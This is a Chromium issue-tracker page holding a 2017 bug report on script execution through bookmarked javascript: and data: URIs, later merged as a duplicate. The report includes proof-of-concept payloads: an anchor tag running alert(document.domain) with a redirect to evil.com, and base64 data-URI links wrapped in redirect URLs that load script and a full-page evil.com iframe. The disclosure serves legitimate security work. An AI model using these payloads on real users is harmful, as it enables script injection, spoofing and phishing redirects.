New issue
Advanced search Search tips

Issue 705202 link

Starred by 1 user
Status: Duplicate
Merged: issue 657380
Owner: ----
Closed: Mar 2017
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug-Security



Sign in to add a comment

UXSS through Bookmark + Data Scheme URI

Reported by anasmahm...@gmail.com, Mar 25 2017 
UserAgent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0

Steps to reproduce the problem:
1. The victim clicks malicious link

   <a href="javascript:alert(document.domain)" onclick="document.location.href='http://www.evil.com'">http://www.evil.com</a>

2. If the user click this link, browser loads evil.com , if the user bookmark the link payload will be bookmarked.

3. The user, bookmark the link by Simply drag & drop the link to Bookmarks Toolbar Items in the above header.

4. If the user then clicks on the bookmark, the injected javascript from Step 1 will be executed in the context of whichever domain is currently loaded in the active tab.

It can also be exploited through  Data URI "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"

The Data URI Scheme  executes script using  ‘text/html’, which makes the browser render it as a webpage.

Hacker or Attacker can perform several types of malware attack through the advantage of   Data URI Scheme which could result in UniversalXSS , Open Redirection, Spoofing and others.

http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg%3D%3D&t=NWI3MzFjMDEzYmI5ZTQzMjJlNzhmOTNhYjJkMWQ1ZTYyMzVlYjAyNiw5OXlxQ2FuOQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158706726327%2Fpoc-click-me-poc-click-me&m=1

http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bwww.WHAK.com%3Bcharset%3DUS-ASCII%3Bbase64%2CPHRpdGxlPkV2aWwuY29tPC90aXRsZT4gCjxzY3JpcHQ%2BCmZ1bmN0aW9uIFRpbWVyKGNhbGxiYWNrLCBkZWxheSkgewogICAgdmFyIHRpbWVySWQsIHN0YXJ0LCByZW1haW5pbmcgPSBkZWxheTsKCiAgICB0aGlzLnBhdXNlID0gZnVuY3Rpb24oKSB7CiAgICAgICAgd2luZG93LmNsZWFyVGltZW91dCh0aW1lcklkKTsKICAgICAgICByZW1haW5pbmcgLT0gbmV3IERhdGUoKSAtIHN0YXJ0OwogICAgfTsKCiAgICB0aGlzLnJlc3VtZSA9IGZ1bmN0aW9uKCkgewogICAgICAgIHN0YXJ0ID0gbmV3IERhdGUoKTsKICAgICAgICB3aW5kb3cuY2xlYXJUaW1lb3V0KHRpbWVySWQpOwogICAgICAgIHRpbWVySWQgPSB3aW5kb3cuc2V0VGltZW91dChjYWxsYmFjaywgcmVtYWluaW5nKTsKICAgIH07CgogICAgdGhpcy5yZXN1bWUoKTsKfQoKdmFyIHRpbWVyID0gbmV3IFRpbWVyKGZ1bmN0aW9uKCkgewogICBsb2NhdGlvbi5yZXBsYWNlKCJodHRwOi8vd3d3LmV2aWwuY29tIik7Cn0sIDUwMDApOwoKCnRpbWVyLnBhdXNlKCk7Ci8vIERvIHNvbWUgc3R1ZmYuLi4KdGltZXIucmVzdW1lKCk7Cjwvc2NyaXB0PjxpZnJhbWUgIHN0eWxlPSJtYXJnaW46MDtib3JkZXI6bm9uZTsiIGhlaWdodD0xMDAlIHdpZHRoPTEwMCUgc3JjPSJodHRwOi8vd3d3LmV2aWwuY29tIjs8L2lmcmFtZT4%3D&t=ZGEwMmJiY2E4ZTM2MzUyNTIwZjEwMjU5MDgxNDA4OTZlMjBiZTkwNSxLdlV5WUlyeQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158777600262%2Fpoc-click-me-poc-click-me&m=1

http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bwww.WHAK.com%3Bcharset%3DUS-ASCII%3Bbase64%2CPHRpdGxlPkV2aWwuY29tPC90aXRsZT4gCjxzY3JpcHQ%2BCmZ1bmN0aW9uIFRpbWVyKGNhbGxiYWNrLCBkZWxheSkgewogICAgdmFyIHRpbWVySWQsIHN0YXJ0LCByZW1haW5pbmcgPSBkZWxheTsKCiAgICB0aGlzLnBhdXNlID0gZnVuY3Rpb24oKSB7CiAgICAgICAgd2luZG93LmNsZWFyVGltZW91dCh0aW1lcklkKTsKICAgICAgICByZW1haW5pbmcgLT0gbmV3IERhdGUoKSAtIHN0YXJ0OwogICAgfTsKCiAgICB0aGlzLnJlc3VtZSA9IGZ1bmN0aW9uKCkgewogICAgICAgIHN0YXJ0ID0gbmV3IERhdGUoKTsKICAgICAgICB3aW5kb3cuY2xlYXJUaW1lb3V0KHRpbWVySWQpOwogICAgICAgIHRpbWVySWQgPSB3aW5kb3cuc2V0VGltZW91dChjYWxsYmFjaywgcmVtYWluaW5nKTsKICAgIH07CgogICAgdGhpcy5yZXN1bWUoKTsKfQoKdmFyIHRpbWVyID0gbmV3IFRpbWVyKGZ1bmN0aW9uKCkgewogICBhbGVydCgyKTsKfSwgNTAwMCk7CgoKdGltZXIucGF1c2UoKTsKLy8gRG8gc29tZSBzdHVmZi4uLgp0aW1lci5yZXN1bWUoKTsKPC9zY3JpcHQ%2BPGlmcmFtZSAgc3R5bGU9Im1hcmdpbjowO2JvcmRlcjpub25lOyIgaGVpZ2h0PTEwMCUgd2lkdGg9MTAwJSBzcmM9Imh0dHA6Ly93d3cuZXZpbC5jb20iOzwvaWZyYW1lPg%3D%3D&t=MjkwNjcxMTNlMGZmMWFiMDhjMDhkNThmZjhmZjBlOGJiMzM1Njk2ZCxLdlV5WUlyeQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158777600262%2Fpoc-click-me-poc-click-me&m=1

What is the expected behavior?
Bookmark should not allow Javascript and Data URIs to be saved.

What went wrong?
Bookmark allows Javascript and Data URIs to be saved.

Did this work before? N/A 

Chrome version:  57.0.2935.0  Channel: n/a
OS Version: Windows 7
Flash Version: Shockwave Flash 10.2 r159

This is just simple payload

<a href="javascript:alert(document.domain)" onclick="document.location.href='http://www.evil.com'">http://www.evil.com</a>

We can modify the payload by disabling alert popup but if we bookmark this, original payload will be bookmarked and this is just demo b/c we can't make popup box when attacking.
gx.png
74.2 KB View Download

Comment 1 by anasmahm...@gmail.com, Mar 25 2017 

VERSION
Chrome Version: 55,56,57
gx2.png
75.0 KB View Download

Comment 2 by jialiul@chromium.org, Mar 25 2017

Mergedinto: 657380
Status: Duplicate (was: Unconfirmed)

Comment 3 by anasmahm...@gmail.com, Mar 25 2017 

Hey, I don't see the report 657380 before submitting this issue but now I see this report It's look like same report as mine but it's not actually same, I clearly describe the exploit.Bookmark not only allows javascript protocol to save but it also allows data URIs to be saved. It's more harmful!

Browser release a new version if the vulnerability exist in the version or make any update.

The report 657380 is about chrome version 54, but my report shows the chrome version 57 (latest).
Project Member

Comment 4 by sheriffbot@chromium.org, Aug 22

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment